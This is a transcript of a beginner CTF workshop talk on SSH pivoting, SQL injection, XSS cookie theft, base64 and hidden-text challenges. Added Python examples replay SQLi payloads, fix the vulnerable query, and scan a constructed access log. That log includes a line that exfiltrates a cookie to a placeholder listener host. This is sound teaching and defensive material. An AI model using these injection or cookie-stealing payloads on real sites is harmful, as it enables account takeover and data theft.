Again, you know, I use the specific environment and it's all the same concept, but it's just a little bit different: permissions are a little bit different, using a different client might behave differently, and so on.

Okay, SSH tunneling is a whole other beast. I'm going to do a diagram, which is going to be super ugly, but I hope it will get my point across. I'm looking for something that can draw. Okay, so the system we are connecting to is on the Internet. This is our client over here. There are probably better tools that I could use. And let's read the description of our challenge from the pivot box machine. So what machine are they talking about? Oh, we acquired it in the SSH China challenge, so we are reusing something we got access to previously. "You can reach a service that spits out a secret. However, pivot box lacks many tools like nc or socat. Maybe we should learn to use SSH tunnels to reach that service. The service is at sysadmin-service on port 5555."

So if we diagram this, it basically would look like this. So our sysadmin service, let's call it SSS, that's better. It's behind a wall, right? It's not reachable directly from our laptop, so there's no way to do this; that doesn't work, that doesn't work. And apparently from SSH we don't have the tools necessary to be able to poke the service directly. Let's try. You know, you never should take the hint for granted, or the description for granted. Let's try. Okay. Usually for a plain-text service you use netcat or curl or whatever. We can try that, or we can try to ping sysadmin-service. So now... oh, I don't even have ping on the system. Can I install ping? Oh, I don't have permission to install software. So I could maybe upload software; that could be a way to solve that challenge, but clearly in my description this is not what I want you to learn here, so we're not going to do that. But then I can try: okay, do I have curl? I don't have curl. Curl is an HTTP client.
Do I have netcat? I don't have netcat. I have wget. I have wget, so maybe this could work, but again, you know, the whole point of the challenge... let's try. Okay, it works now. So the service was down, but I brought it up. If it was down, it means that it's easy, it's agile, so let's be kind with the service, but if it's ever down again, just let me know and we'll restart it. So it worked-ish, but I couldn't write the file: permission denied. So clearly, again, this is not the way. But basically what I want to add here is that even though we have presence here, we cannot reach the service this way. So that does not work; here we don't have sufficient access.

So this is where tunneling, or pivoting, kicks in. We can use SSH as a tunnel. Okay, so this basically is a tunnel to reach the other system on the other side of it. So we connect to SSH regularly, we build the tunnel, and we tell the tunnel: when a packet arrives here, we want you to send it there, on the other end of that tunnel. So we're going to write a fancy SSH command that will do that: it will go in the tunnel, and it will come out of the tunnel where it has reach to the other network. Well, this is getting confusing, but it will come out and be able to reach the other system. Now in SSH's language this is called SSH tunneling, but specifically local port forwarding. So now we can, you know, google it. And we don't care about the concept, we want the command. Okay, the command is here. I explained the concept, that's why I'm skipping ahead. So dash capital L: local IP, which is optional; local port, mandatory; destination; and destination port. Luckily, we have all that in our challenge description.

So we disconnect. This is important: we're tunneling through that system, so we're not going to do that on that system. So we disconnect, and we reuse our previous command, because we need to authenticate to the service with the same user and the same port,
and the same key, but we're going to add the forwarding characteristics. So the destination port, if we look at the challenge description, is 5555. The service that we're trying to have spit out a secret is running at 5555, so let's put 5555. The destination is the name. So here Docker is kind with us: it provides DNS, so we're not using real IPs, we're using names. So we put that in here. And then the local port is pretty much at our discretion. I like to use 12345, easy to remember. And then the local IP is if you need to bind to something other than localhost, but we don't need to do that. So I had ssh two times here, so I need to remove the extra one.

Okay, so now we are doing ssh. We're specifying that we want to do a local forward. So we're building the tunnel from our machine to the pivot box system on CTF 101, which means that the end of the tunnel will be on the other side of that system. And here we're saying: from the other side of the tunnel, we're going to do a local forward. So the current system is going to be CTF 101, which means that the end of the tunnel will be on the other side of that system, and here we're saying that from the other side of the tunnel, the system should reach to sysadmin-service on port 5555. So going back to the diagram, let's use another color. The command is building this portion here, with the specific intention of sending to that system.

Now another thing that people might be surprised by when they run a command like that is that we still get our prompt. We are still connected on pivot box. And the reason is that SSH has channels, and we still requested a command channel, but we added the tunneling channel on top of the command channel by default. We could add a flag that will not require a command channel, but it's just not necessary. But what's counterintuitive about what we just did is that the next step needs to happen on my local system, not on the pivot box system.
So I need to open a new terminal. In my case I'm going to split my screen so that you see. So the next command is: I want to send that packet, I want to reach the end game here on port 5555. To do so, I'm going to use netcat. Now the tunnel is from my machine to this service. So I use 127.0.0.1, or localhost, and I chose to use port 1255. So now what will happen if I do that? Congratulations, I pivoted. So my local packets were sent to the destination that we specified in the SSH tunnel. That service is just a kind person that gives the flag on first hit. But then, you know, in a real CTF the twist is that you'll have to exploit that service or do something more to that service, but the pivoting concepts remain, and they are really important. So we're going to copy this, put that here, submit, and we won.

Now, could we run this directly via the machine? Did you guys figure it out from pivot box? How did you do it? Standard out. Okay, that's a cool one. So let's do that. I was asking because I knew they would bypass the restriction of the challenge. So let's just do that for fun. Right, so sysadmin-service, and then, since this is a URL, now the port is not a different parameter, it's part of the URL. And since HTTP is a text-based protocol and my flag is text, it's going to work, it's going to spit it out. So the previous error we got is that it tried to write to the file system, but the file system is unwritable by definition: I didn't want you to copy executables. So what Vincent suggested as a workaround is, okay, with wget you can tell it, instead of writing a file, to show the content. So this is capital O for output. By default this would try to write to a file, but we can't. So we're going to use dash dash, which is like Linux lingo, or the Linux standard, for saying it's standard out, the console. So with this capital O...
So with this, what we have is, you know, you see that it tried to do HTTP, you see that there's something wrong because there are no headers and it's assuming a super old version of HTTP. But still, you know, we got something somewhat mangled, but we still got enough of the flag to be able to win the challenge. So this would be a bypass of the challenge. And it's totally legit in CTFs, right? We tried to put a restriction, we tried to send you in a direction, but you can do whatever you want. There's no problem.

Okay, so moving on. So now we're really shifting categories of challenge here. These are the web challenges. They're fairly approachable and interesting. But the sysadmin ones are kind of the base layer, you know, necessary for more infrastructure-type CTFs. So: the source. So here the challenge says "use the source, Luke", as a thousand challenge designers before me have said. And there's a website. We're going to open the website. Ah, there's a username and password. I'm not sure what to do, but I'll take the hint and do a view source. Okay, so what we have here is in the source. We did view source. We have "disabled the support account", and then "if needed, the support account is" with a username and password. So basically this is HTML code that says, you know, it's a comment, don't display it. And so this is pretty much in our face, right? We know we need to copy this into the page.

We're going to do this in just a second, but before I go there, I want to talk to you about a twist on a challenge like that that I've seen, just to put you in the mindset of CTF solving. I've seen a challenge like this where there were empty lines at the bottom and the real flag was just 12,000 lines below. So the only thing that was different is that there was a scroll bar on the side. So sometimes it's really in your face, right? You need to think about it, or you need to do a Ctrl-F and search for "flag", or whatever.
Now, the username and password. So it's "welcome to"... we can close that. So: support. "Welcome to", and login: "hidden account activated, here is your flag". So we got this. Place that here. Here we go. Yay.

SQL. So things are getting spicier, but I see many solves, so that's good. Okay, SQL injection is... well, yeah, it's clear. If you're a programmer it's kind of obvious, but if you're not, this is more difficult. So why is SQL injection so pervasive? It's because data is mixed with code together, and you run it into an interpreter, which is the SQL engine. And when that is done, you know, there are all sorts of bypasses to be able to access that information. So this challenge is instructive, and it is a 101 challenge because it shows you the code. So what's happening is: SQL is Structured Query Language, and it's to ask questions to a database, and usually all SQL queries return rows and columns with values. Okay, so rows and columns; it's a table basically, in most queries. And we see that query here. So this is not a regular thing, right? This is special-purpose made. But you can also think that whenever you think you have an injection, you can always spin up a little database using MySQL or SQLite and try the things on your system, where you can see, where you're not in a blind environment. So there are always ways to reproduce a smaller subset of the problem on your computer.

But now we have the output. So I put "or", because the classic is like "or 1=1". And here we have hints. So what we are seeing here is what is in the database. Okay, so this is the content of the database, so I'm going to search for "flag". Why not. The flag is "nice try", so my database is basically trolling us. So now I'm going to try to spice things up by, like, oh, I'm going to try "or 1=1". And it says "you want something". But let's take a look at our string.
The mistake here is that we are in a LIKE context. So this is the condition of the query, and there are double quotes. So when we put in "or 1=1", we never escape the context of the double quote. So what's not done here... Let's disconnect. Okay, so we have this here. So what we want to do... this is the output when we write "or 1=1". But what we want to do is close that double quote. This will give something like this. And then we're going to have this. Okay, so if we put only a double quote, this is what's going to happen, and this is probably not legal SQL. Let's try. If I put just a double quote... There are so many ways to bypass that challenge, by the way. Okay, so I have an error. So it means that basically the query failed and it threw an error; PHP caught the error and PHP threw the error back in our face. In many production contexts the error will be hidden, so all you'll have is a 500 or whatever, and this will not help you.

So okay, so this one is broken. Now how could I unbreak it? So this would kind of be jumping straight into the solution, but let's try. Okay, so I'm going to do double quote, space, "or", then "1=1", which means that the query will become this: double quote, "or 1=1", and then the remaining percent and quotes will still be there. Right. So do we think this will work? Let's try, since you seem unsure. I have an error. Why is that? Because the double quote is still here at the end. It's never starting, never ending, so it's an unbalanced double quote. So the trick of all the SQL injection folks is: there is a functionality in SQL where you say the rest of the line is a comment. So if you turn the rest of the line into a comment, this means that our code will look like this, and then comment, and the rest doesn't matter: no more quote balancing or whatever. I can try that.
Boom, we've got our flag right here. And so the value was "flag" but written with fancy Unicode letters. And we have a flag with our flag. Now, let's think of a couple of bypasses, because now we did kind of the, you know, 101 SQL injection, but looking at it this way here, it's like we're almost there, right? And this is a new bypass that I figured out now, because there's another one that is even easier that I'm keeping for later. So: double quote, and then all I need to do is comment the rest, right? That would work. Let's try if it does. Because the percent is like the asterisk of SQL: percent means anything. So if we only have percent, we will get all the database, or all that table, sorry, to be specific. So let's try with just the close quote and then dash dash. It works. We still have our content. Now the easiest bypass is the percent bypass, because you will basically get in the command triple percent, which means everything, everything, everything. So let's try, and it works. So this challenge is completely, you know, broken if you think about it from that perspective, but it's still educational about how it works, and the fact that you can see the query really helps you there.

In CTF 201 we could do the step of, you know, having your own database locally, but running a database on a Linux system is as easy as typing sqlite and then enter. And now you can create a table and then query it. I'm not sure how the schema works, but: select 1, and you get 1, right? Select 1, 2, 3, and you have three: one row, three columns, 1, 2, 3. So it's a good way of playing with it, toying with it, but it's a little bit out of scope for what we're trying to do here. All right. Oh, without double quotes, with double quotes. Oh yeah, interesting. So, but the quotes are there. It works. Okay. It works on all engines. Okay, interesting, I didn't know about that one. So semicolon definitely worked.
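The quote-closing and comment trick walked through above, as an added Python example that is not from the workshop: a constructed SQLite table stands in for the challenge's data, `search_vulnerable` pastes input into a LIKE condition the way the challenge page does, and `search_fixed` is the parameterized version a developer would ship. The challenge's query used double quotes; single quotes are used here so it runs on every SQLite build, and the mechanics (close the quote, comment out the rest, or send `%%%`) are identical.

```python
import sqlite3

# Constructed sample data standing in for the challenge's table; the real data is not on the page.
ROWS = [
    ("flag", "nice try, keep looking"),       # the row that trolls a plain search for "flag"
    ("f\u0142ag", "FLAG-constructed-example"),  # "flag" spelled with a look-alike letter, as in the challenge
    ("note", "hello"),
]


def _db():
    """Fresh in-memory database per call so every query starts from the same state."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE hints (name TEXT, value TEXT)")
    db.executemany("INSERT INTO hints VALUES (?, ?)", ROWS)
    return db


def search_vulnerable(user_input):
    """User input pasted straight into a LIKE condition, like the challenge's query.

    Returns (query_as_executed, rows) or (query_as_executed, error_text)."""
    query = f"SELECT name, value FROM hints WHERE name LIKE '%{user_input}%'"
    try:
        return query, _db().execute(query).fetchall()
    except sqlite3.Error as err:
        # The challenge's PHP page echoed this error back; production apps usually hide it behind a 500.
        return query, f"error: {err}"


def search_fixed(user_input):
    """Parameterized version: the input is bound as data, so quotes and '--' cannot change the query.

    LIKE wildcards are escaped too; otherwise '%%%' would still dump the whole table."""
    escaped = (user_input.replace("\\", "\\\\")
                         .replace("%", "\\%")
                         .replace("_", "\\_"))
    return _db().execute(
        "SELECT name, value FROM hints WHERE name LIKE ? ESCAPE '\\'",
        (f"%{escaped}%",),
    ).fetchall()


if __name__ == "__main__":
    # Replay the steps of the talk: plain search, naive 'or 1=1', bare quote, quote + 'or 1=1',
    # then the two working bypasses (comment out the rest, or all-wildcard).
    for payload in ["flag", "or 1=1", "'", "' or 1=1", "' or 1=1 --", "' --", "%%%"]:
        query, result = search_vulnerable(payload)
        print(f"{payload!r:16} -> {query}\n{'':19}{result}")
    print("fixed:", search_fixed("' or 1=1 --"), search_fixed("%%%"), search_fixed("flag"))
```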
Okay. Yeah, so moving on to our next challenge. Whoops, I forgot to put the flag. I need my points. It's also a classic that happens in CTFs: people are stressed and they forget. We see it a lot. Okay, so communication in your team is really important. We see a lot of double submissions, which means, if it's a two or three hour challenge, someone lost three hours that could have been spent on something else, but worked on the same thing as the other. To organize, you can use Discord, Google Drive, you know, choose your own, or Trello, or Kanban, GitHub Projects, whatever. Yeah, they are means to collaborate in order to avoid losing time like that. Oh, we have a lot of solves. I'm impressed. You're familiar with this stuff.

Okay. So, self-XSS is a weird one because it's totally fake. But let's try. Okay, this looks like an injection challenge. Let's try that. And this is not the injection challenge. Okay, so why would you immediately have the reflex of XSS here? It's because you gave user input to the application and it throws you back your user input. So now the way of trying to see if you have an injection context is to try to write HTML. So contexts are super important in HTML. And basically, if you can move from HTML context into a script context, then you're basically running code in people's browsers, in this case, yourself. But if you can trick the person, because the payload is in the address bar, then it means that you can craft a URL that, if you can trick someone into clicking on it, will trigger the payload, it will run in his browser, and you will be the controller of that code. And then you will be able to make it exfiltrate secrets, which is the next challenge, but now we're just going to XSS ourselves. Now, to validate if there is filtering or not, here I decided to add the tags so that it will be bold. So does that work? Oh yes, it's bold.
So it means that there is no HTML escaping; we are injecting HTML here. The payload that you will always see is the good old script alert(1) payload, which means that the browser will enter a scripting context, it will see JavaScript, and it will execute it. So, boom, I have a browser message saying 1, so it executed code, and the code is in the address, so it means that if I send this to anyone here, you will get a pop-up message saying 1. Congratulations, you XSSed yourself. And here's the flag.

Next up is XSS Larry. So can you XSS Larry the clicker? So basically here we're simulating someone who clicks on links, like everything you send him. The goal is to steal something from his browser, because he has cookies that we're interested in. Basically, if you steal the right cookie, you can impersonate me on Outlook or whatever resource. And so, let's take a look. So this is the page we want to steal from. And Larry is here. So basically it's like sending an email with a link in it and hoping the person will click it; this is just a simulation of that for CTF purposes. And I named him Larry. And: steal a browser cookie for the CTF 101 domain. And if you want... so we don't know where Larry sits, or where his access to the internet needs to be, and we need something listening on the internet. Otherwise, when we run code in his context, we will not get the ping to our context, to our system. So this is why I recommend you run pivot box, but other people have their own machine online, and as long as it's reachable and Larry has the same DNS resolver capabilities as we had for sysadmin-service, which you can use, this sysadmin SSH, it should work. And here it says, yeah, since this is a shared system, we need to each pick our own port, otherwise we will mess with each other. So let's connect there. I have the web server here. I'll pick a different port right away. I think it's just like that. Yeah.
Okay, so I have a web server running on zero, on all addresses, on port 12345, which is reachable like that. We can try to see if Larry works. I think it should connect, I don't remember. I'm just queueing the link. Will I get hit? I don't know. No, no, no, I need to put sysadmin-service. Yeah, I made a big mistake, so I need to use the hostname that will be resolved as that system, on that port. So this is kind of the first test. So we know that we're getting hit by the bot. But now this is why it says it's strict. So what we need to do here is craft something in that web page, a URL, that when someone clicks on it, it will send the cookie to me, a third party here. So now we'll be able to build that.

First, we will try to access the content itself. So document.cookie. Do I have a cookie? Can I set the cookie? There's no parenthesis, it's a property. This is the part I usually always rehearse, but I didn't today. So I might jump to my solution. So I have a Google Analytics cookie, luckily enough. And so I know that I am injecting, I can run JavaScript. Now how can I get these cookies sent to me? The classic way, I don't know that. So these guys are actually working in the field; I'm a researcher, so I don't do XSS all the time, but they might have a very different payload than what I'll build with my notes. And so I'm curious to hear about how they'll come up with the solution, but let's start writing down the payload. So one easy way, and this is a bit odd, but if you basically put in an image, the browser will go and fetch that image. So usually this is one of the tricks that are used to, you know, make a browser reach a different resource. So I know that the clicker will reach that. So if we do this, and then href with this, and then... that gives like this. So this locally will not be satisfying because my system doesn't know anything about sysadmin SSH. It was okay with me? The single quote.
No, no, no, no, no. So, as I said, this wouldn't be satisfying, but src, not href: href is for a tags. But it will display a broken image anyway. But where we're heading is, we're building small steps to see the whole solution. I have double quotes again; single quotes. Let me bring that back to my notes. Okay. So do we have our image tag? That is what we're interested in. So the image is here, and if we look at the code, the DOM has that node in it now. The DOM, the Document Object Model, is the whole web page, if you want. So we know that it worked. And now what we want to do is to give that to Larry. Okay, this is a complete URL that will fetch an image on a third-party resource, which is sysadmin SSH. It results in a broken image for me; it will result in a broken image for Larry as well, but the difference is that we will see if it's working. We will see it in our logs here. Okay. Message: file not found. It means that we're onto something.

Now, what we need to do is add the cookie in that command. Without... what's that? The link... and did we lose the key? To add the cookie without using double quotes. And I think this is where I'm always bad. So, but you can assemble the string. Wait, wait, wait. Ah, it's good. I think I never saw that one. Okay. So now there are thousands of ways of injecting JavaScript; you can do it however you want. And now they're talking about the cleverest and smallest payload. The difficulty here is you can't use double quotes. So because of that, you could assemble the string, but doing it without double quotes with the cookie is kind of difficult. So the solution that he's proposing, which is very clever, is that we're going to do this in a pure JavaScript payload. So window.location is a way in JavaScript to send the browser somewhere.
So if Larry clicks on our link, and we send Larry to our system where we have an HTTP server, and we can make the URL leak us the string we're looking for, we will have the cookie and the flag. So, window.location equals our sysadmin SSH service, which we can use with single quotes, and then it's plus, to concatenate, and then we're going to do, you know, just because we're fancy, "stolen=", and then document.cookie. URL-encode the whole thing? Oh, just the cookie. What's the API? This is where you hit Google. Yeah, let's do it clean for them. "JavaScript URL encoding": encodeURI, is that what you're looking for? That's right. You know what, let's do one without and one with, so we see the difference. I mean, I probably need to pack everything. So I want to jump out of the HTML context, jump into a script context, and I want to send your browser to the... did you try it on this one? Okay. I'm not sure if it would obey the location and redirect, but... Okay, so we're going to send the browser to that URL, and here we're saying the URL is something that doesn't exist, with parameter document.cookie. So, try it.

To me, this is the hardest challenge of CTF 101 because I suck at web. Oh, no, no, no, I didn't do the right thing. So I made another mistake, a classic mistake. I put it in the page visitor, but the page visitor visits links. This is not a link. So I need to do it on myself to get the link. Oh, I'm... yeah, I'm redirecting myself here, one second. But this should work as well. Oh, I lost it. Yeah, that's not the right payload, one second. No, look. Now, now, now, now. Yay.
All right, so I have basically the payload, and you could also URI-encode the payload, and then you would get... the thing is that slash is a special character, so you need to encode them, so they become... this is an angle bracket, %3C. The web is just a mess of encoding, and you always need to realize where you are and escape in the proper way. And with practice this comes naturally. Like everything, no one bicycles on the first day. Yeah, so we have this here. Let's try. Oh, I didn't get my usual Larry prompt. Okay, now it worked. Let's wait. Whoops. That's here, and then... Oh, yeah, so we're lucky here, because we have the thing and it worked without the URI encoding. Let's try with the URI encoding; what will it change? But nothing was escaped. Can we break it? Yeah. But can we show them, like, if I put a bracket, will I break it? I don't think so. Okay.

That's his idea, because I'm going to show you the payload I use usually; it's so complicated. I'm going to put the final link here. Yeah, they're there to help if you want, and like I said, there's a lot of XSS in CTFs, and it's a difficult one to wrap your head around. So do not hesitate to ask for help. I thought I had my solution. Ah, here it is. Okay, so this solution here uses a script tag to create an image element. So this is basically a way to avoid double quotes. So you can use single quotes everywhere because it's in JavaScript. And so you create the image element and you specify the source, and when you do so, it will basically go and fetch that image, and when it's trying to fetch that image, it will work. The complicated one I had was that I was trying to concatenate, and since you need the image and the source, you need two types of quotes. So that doesn't work, mixing them, because it won't parse.
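From the defender's side, the probes and payloads discussed above leave traces in the web server's access log. This added Python example (not the workshop's code) scans constructed common-log-format lines for the reflected-XSS indicators the talk walked through, percent-decoding the query string first because, as noted above, `<` arrives as `%3C` and is sometimes double-encoded. The log lines, IPs and the `listener.example` hostname are all constructed.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed access-log lines in common log format (not from the workshop's server).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /?name=alice HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /?name=%3Cb%3Ehi%3C/b%3E HTTP/1.1" 200 530
10.0.0.7 - - [01/Jan/2024:10:00:09 +0000] "GET /?name=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 560
10.0.0.9 - - [01/Jan/2024:10:01:00 +0000] "GET /?name=%3Cimg%20src=x%20onerror=window.location=%27http://listener.example/?stolen=%27+document.cookie%3E HTTP/1.1" 200 600
10.0.0.3 - - [01/Jan/2024:10:02:00 +0000] "GET /?name=%253Cscript%253E HTTP/1.1" 200 500
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Indicators follow the steps of the talk: the bold-tag test, the script context,
# an event handler on a broken image, cookie/location access, and the charCode trick.
MARKERS = [
    ("html-tag-injection", re.compile(r"<\s*(b|i|img|svg|iframe)\b", re.I)),
    ("script-context", re.compile(r"<\s*script\b|javascript:", re.I)),
    ("event-handler", re.compile(r"\bon(error|load|click|mouseover)\s*=", re.I)),
    ("cookie-access", re.compile(r"document\.cookie|window\.location", re.I)),
    ("charcode-eval", re.compile(r"fromCharCode|\beval\s*\(", re.I)),
]


def fully_decode(value, max_rounds=3):
    """Percent-decode until the string stops changing: %253C -> %3C -> <."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def analyse_line(line):
    """Parse one log line; return a finding when the decoded query carries an indicator, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = fully_decode(urlsplit(m.group("target")).query)
    indicators = [name for name, rx in MARKERS if rx.search(decoded)]
    if not indicators:
        return None
    return {
        "ip": m.group("ip"),
        "time": m.group("ts"),
        "status": int(m.group("status")),
        "decoded_query": decoded,
        "indicators": indicators,
    }


def scan_log(text):
    """All findings for a log, in file order."""
    return [f for f in (analyse_line(line) for line in text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["time"], finding["ip"], finding["indicators"], finding["decoded_query"])
```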
So I was using a charCode encoder, so this is malware-like, but I was encoding everything, and I built the string from charCode... they're laughing because they see how fucked up I am, and it worked, but it's like, yeah, I don't know, I've seen more malware than XSS in my life, clearly. And so this is the same thing, right? It will... and maybe it will work. Now I'm using like 192, so I'm using hard-coded IPs that will fail. But the thing is that I built the payload and I encoded it in charCode, and I'm using JavaScript to decode this from charCode and then evaluate it, which means: consider this string as JavaScript, which then runs the payload. And so this was my bypass to avoid the double quote. So when I said my solution was complicated, here you go. Okay. So with this, we exfiltrated the flag, so let's copy it and submit it.

Now, a little break for us: encoding. So again, this comes up often, and it's not... so why is it in CTF 101 since it's so easy? It's because it's always there, but it's not directly there. There are rarely points to be had for doing straight-up base64, but a good way to hide a flag, so that you will not be able to find it by looking for "flag", is by encoding it in base64. So you kind of have to have the habit of seeing it often and knowing what to do quickly when you look at it. So it's also a nice introduction to a very good CTF tool called CyberChef. So CyberChef is a web tool from GCHQ, and it's local, you're not sending anything to the spies in the UK. It runs in your browser, and it supports a ton of stuff; there's even one called Magic. And Magic didn't... Oh, so Magic suggests base85, but it used a depth of three. We try a depth of one. So Magic is not working for base64 intensively. Oh yeah, it's trying a lot of stuff. Maybe a bit too much, trying too hard.
So basically base64: what gives it away for me is the presence of the equal sign at the end, so it's a padded format, because the length is not necessarily aligned. And it always looks like this; it's a reduced alphabet. It's meant to be safe to pass binary data, and you have it here, right? It's the second option, "From Base64", and then you will get the output in this field. Oh, there's a mistake. "You should recognize basic encoding techniques just by looking at them; congrats, because it looks like you just did." Here we go.

The CTF 101... Larry has too many clicks. We're going to go back to it. It's possible. Wow. I lost it. Power cycle. I put the URL on the Discord; maybe that's the problem. There are probably more players than I anticipated. I could resize it. We're going to power cycle it, or not power cycle but stop. So I'm going to resize this, to the point where I must not forget to resize it down, because it's going to be 500 bucks a month. I don't want to grow the disk. Can I do that? Yeah, it's trying. Maybe if I refresh. It's still powering off. Oh, it's down now. I don't like that error, that message. I'm not going to resize now. Usually it's fast, but I'm not going to take that risk. Turn on. So if anyone here is unsure about your XSS payload, try to have it looked at by the guys here, the pros, because clearly we're exhausting resources. It could be other things, so I'm not blaming anyone, but yeah, Larry is a Node.js app that is spawned, so the whole JVM, so it can take some resources. It's the first time we're having issues like that, but I never put it on Discord before. If we're like 100 people, then it might explain it.

But in the meantime, by the way, the XSS payload is kind of similar to what you were trying to do in the beginning. Just an image that isn't valid. It's onerror. I didn't mean to do that. Oh, yeah, yeah, yeah. Cool. So. But onerror, onerror, but how do you... onerror, you... image source dot... people hex? It's always an error.
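An added Python example (not the workshop's code) that makes the two cues above mechanical, the reduced alphabet and the trailing `=` padding, and then decodes the candidates it finds in a document to surface a flag that a plain text search for "FLAG" misses. The sample text and the flag value are constructed.

```python
import base64
import binascii
import re

# Constructed sample document: the flag is present only in base64 form, so a plain search misses it.
SAMPLE_TEXT = """Meeting notes, nothing to see here.
Session token: RkxBRy1oaWRkZW4taW4tYmFzZTY0IQ==
Remember to search the document for the usual keyword first."""

FLAG_RE = re.compile(r"FLAG-\S+")
# Runs of base64 alphabet characters, long enough not to fire on ordinary words, with optional padding.
B64_TOKEN_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def is_probable_base64(token):
    """The visual cues from the talk, checked mechanically: only the reduced alphabet,
    at most two '=' at the very end, and a total length that is a multiple of 4."""
    return len(token) % 4 == 0 and re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", token) is not None


def decode_if_text(token):
    """Strictly decode a candidate; return the text only if it decodes to printable UTF-8, else None."""
    if not is_probable_base64(token):
        return None
    try:
        raw = base64.b64decode(token, validate=True)
        text = raw.decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def plain_search(text):
    """What a Ctrl-F for the flag pattern finds in the raw document."""
    return FLAG_RE.findall(text)


def find_hidden_flags(text):
    """Decode every probable base64 token and look for the flag pattern inside the decoded text."""
    found = []
    for match in B64_TOKEN_RE.finditer(text):
        decoded = decode_if_text(match.group(0))
        if decoded:
            found.extend(FLAG_RE.findall(decoded))
    return found


if __name__ == "__main__":
    print("plain search:", plain_search(SAMPLE_TEXT))        # []
    print("after base64 decode:", find_hidden_flags(SAMPLE_TEXT))
```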
Yeah, that's where you are. Plus. Oh, yeah, yeah, I know the execution scope, but you fetch the URL from where? From window.location. No, sir. Oh, yeah, okay. Any URL does document.cookie, but this... But I understand, because this is going to be JavaScript, but you need it to build something that will query something, with Ajax or... Okay. Okay. So if in onerror you return a URL, the browser will, boom, go there. Okay, I didn't know that. Oh, it's a shame. Maybe that's why it works. But that, he spins. Okay, I think, yeah, the sysadmin box needs to be restarted, but besides that, we're good. Okay, everything is back up. Now let's complete our encoding one. And I have it. Okay, so we're back on track.

Document one. So there's a hidden flag in this document. It has two flags, and this is the easiest of the two. So sometimes, for a track, it's normal to have more than one flag in a single document, but you need to think, oh, maybe I didn't find the first one, I need to think of submitting the other one. Let's do this forensic... save. Where is the flag? Ah, I know. So in a document, things can be hidden away, right? So we're going to search for "flag". Is that like, oh, look at that. There's something white with a mistake at the bottom. We can highlight it all, and then we can make it dark. My little office is broken. What's that? I don't even know where the colors are anymore. Ah, here it is. Okay, so if you put it, make it bigger. Okay, now color this. Oh, it's a flag. So that's a bad example, but the concept of something hidden in plain sight is the lesson here. I've seen this in CTFs, but I don't think we did something like this in NorthSec ever, and I don't think there's stuff like that at Hackfest, is there? I saw that in the real world, like as someone was trying to find something. So it really happened. Okay, okay, cool. Yeah, it is. In cryptography, they say it's the Kerckhoffs principle.
That is, the resistance of your cryptography must be in the key, not in the algorithm. This is what we've been doing for years in crypto. But prior to his statement, a lot of encryption was in the algorithm. In the Roman days, they would tattoo a message on the head of someone and then wait for the hair to grow, and when you receive the slave, you shave the head and you have the secret message. This doesn't respect Kerckhoffs's principle, because if you know the algorithm, you're just going to shave everyone and you're going to find the secrets. So this is not Kerckhoffs-sound either, because clearly if you know someone's going to hide something like that by putting white on white, then you will find their secret. But so, up and correct. And we had many solves, we had 10 solves before I saw this, congratulations. And all I did was a search for "flag".

Now, this is the same as the challenge document one, but there's a hidden lesson here again. And this I had in a real CTF at Hackfest, and when I was told the solution I was really pissed off, so I remember for all my life the technique that was used. So if we take the text, for example, and we copy and paste it in Notepad; Notepad isn't rich, you know, Notepad is just whatever you had, right. So is it revealing something that we didn't expect? Let's not do Notepad, let's do... yeah, local. So if we paste it in whatever text editor, what we have is: the security format, six, F, capital F, or capital L, vast, capital A, capital J. So from there, and then it's a dash, right, so from there you could do F, L, A, J, dash, and then it's L, E, F, L, A, J, B, blah blah blah. Now, what we're going to do here is another opportunity: a classic DEF CON Quals challenge would be to do something simple like that, but at a scale that you will not be able to solve without programming.
This is a very classical way that the people at DEF CON operate. So let's assume it's a super long flag that cannot be done by hand, and let's try to build a solution using the computer, and do it quickly. Now, the first word with this is this one, and this is probably the last, like "security for", that's it. Okay, so let's just pick this string specifically. And then let's whip up the good old IPython console. So Python has a good REPL, an interpreter that you can program interactively with, but IPython is better because it has syntax highlighting, I think, and it will auto-complete APIs; I often work with that. Now I am giving this as a string. And what I want to do is, okay, let's get all the words. So I can try to do split, split on spaces. Now I have a list of words where the last letter is of interest. Okay, now I can get into list comprehension mode and try to do "for c in". So I am iterating on a list. And if I do "c for c in" the split, I will get the words again, but now I have c, which is each word, but I want the last character. How can I get the last character in Python? I think it's this. No, this is reverse. This. Yeah, okay, so this is the last character. So this is what I want to use in my comprehension: here minus one and then the rest. So now I have the last character of every word, but still in a list. And now I can join that list, and the join API is you need to use a string, so I'm doing an empty string, join, of this list of the last characters I'm interested in. Now clearly there's a problem, because I have semicolons and commas. How can I make my one-liner even better? I can replace the characters, so I can chain a replace of a comma to nothing. Does that get me further along?
Okay, so I have a list. I need to do that before the split, because I want to work in string context, not list context; I can split afterwards. Okay, I'm getting closer, but I still have the commas and the dots. So let's add two more replaces. Again, I'm going a little bit fast here, but the lesson is that a little bit of scripting can go a long way. So here's the kind of scripting, by the way, that ChatGPT is really good at, so if you haven't played with it you should, because otherwise we will be replaced by machines. We need to be smarter than the machines, we need to leverage them. Now we have something odd in there, but we have enough that we can probably figure it out. So we saw in the original string that there was one condition that didn't work properly; we see here there was no L, so we skip this T here. And then this is French. So it's the flag. We can probably figure out the subset of French that is real from that. So, again, in five minutes we whipped out a really quick scripting solution that we could scale. And this comes with practice; you cannot necessarily succeed on the first run, but list comprehensions in Python are a very powerful construct that gets a lot done in a one-liner. And this is the opportunity of CTF code: you don't have to do anything with it ever again, it can be as obscure as you want, as long as you got the flag it doesn't matter, it doesn't have to be maintainable. So, `\xa0`, I think, is newline or something like that, that got slid in; the A could have been from a good character anyway. So getting rid of that and getting rid of the lowercase t, submitting, and we got it.

